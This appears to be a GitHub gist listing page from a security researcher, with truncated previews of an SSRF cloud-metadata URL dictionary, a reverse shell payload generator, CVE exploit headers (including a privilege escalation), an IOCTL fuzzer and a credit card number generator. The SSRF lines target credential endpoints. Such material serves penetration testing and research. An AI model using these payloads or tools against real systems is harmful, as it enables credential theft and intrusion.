klezVirus
/ cloud_metadata.txt
Created
January 13, 2020 14:55
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
klezVirus
/ genrevshell.py
Created
September 17, 2020 12:22
Simple script to generate reverse shell payloads for PowerShell and NodeJS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import argparse | |
| import sys, os | |
| import ipaddress | |
| import base64 | |
| from tempfile import NamedTemporaryFile as ntf | |
| from subprocess import run | |
| class Encoder: |
klezVirus
/ Invoke-DefenderDownload.ps1
Last active
September 23, 2020 08:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Module: Invoke-DefenderDownload | |
| Author: d3adc0de | |
| Licence: MIT | |
| Permission is hereby granted, free of charge, to any person obtaining a copy | |
| of this software and associated documentation files (the "Software"), to deal |
klezVirus
/ Invoke-USBDevSearch.ps1
Last active
September 23, 2020 08:33
A script to search for USB connected devices using Windows registry
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-USBDevSearch(){ | |
| <# | |
| .SYNOPSIS | |
| Easy script that searches through connected USB devices filtering via a text string or guid. | |
| # Import | |
| ipmo .\Invoke-USBDevSearch.ps1 | |
| # Run | |
| Invoke-USBDevSearch [-Search|-Guid] <search-term> | |
| .EXAMPLE |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Title: Simple Credit Card Number Generator | |
| Author: d3adc0de | |
| Description: A simple script to generate random credit card numbers, using the same (or similar) | |
| approach used by major Credit Card Issuers. | |
| To do that, the script uses the expected prefix and length used by a specific | |
| issuer, and further validates the generated number against the Luhn Formula. | |
| """ | |
| import string | |
| import random |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import csv | |
| import sys | |
| import os | |
| import argparse | |
| def check(args): | |
| csv_injection = ["=", "@", "+", "-"] | |
| end = "\n [-] Finished!" | |
| novuln = " No Vulnerability found." |
klezVirus
/ cve-2017-11356.py
Last active
March 15, 2021 11:01
CVE-2017-11356: PEGA Platform Missing Access Control
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import argparse | |
| import traceback | |
| import pytest | |
| import time | |
| import json | |
| from selenium import webdriver | |
| from selenium.webdriver.chrome.options import Options | |
| from selenium.webdriver.common.by import By |
klezVirus
/ CLI-AMD.js
Created
May 14, 2021 12:59
— forked from Vadorequest/CLI-AMD.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| define(["require", "exports"], function (require, exports) { | |
| /** | |
| * Helper to use the Command Line Interface (CLI) easily with both Windows and Unix environments. | |
| * Requires underscore or lodash as global through "_". | |
| */ | |
| var Cli = (function () { | |
| function Cli() { | |
| } | |
| /** | |
| * Execute a CLI command. |
klezVirus
/ crude_ioctl_fuzzer.py
Last active
May 31, 2021 08:16
— forked from uf0o/crude_ioctl_fuzzer.py
A crude IOCTL fuzzer for windows driver testing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import random | |
| import sys | |
| import struct | |
| import io | |
| from ctypes import windll, POINTER, byref | |
| from ctypes.wintypes import LPVOID, DWORD, LPCSTR, LPSTR, BOOL, HANDLE | |
| from enum import Enum | |
| ''' | |
| #define IOCTL_HEVD_TYPE_CONFUSION 0x222023 |
klezVirus
/ CVE-2018-5701.py
Last active
June 1, 2021 20:01
CVE-2018-5701: iolo System Mechanic Pro Local Privilege Escalation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit title: iolo System Mechanic Pro v. <= 15.5.0.61 - Arbitrary Write Local Privilege Escalation (LPE) | |
| # Exploit Authors: d3adc0de | |
| # CVE: CVE-2018-5701 | |
| # Date: 01/06/2021 | |
| # Vendor Homepage: https://www.iolo.com/ | |
| # Download: https://www.iolo.com/products/system-mechanic-ultimate-defense/ | |
| # https://mega.nz/file/xJgz0QYA#zy0ynELGQG8L_VAFKQeTOK3b6hp4dka7QWKWal9Lo6E | |
| # Version: v.15.5.0.61 | |
| # Tested on: Windows 10 Pro x64 v.1903 Build 18362.30 | |
| # Category: local exploit |
OlderNewer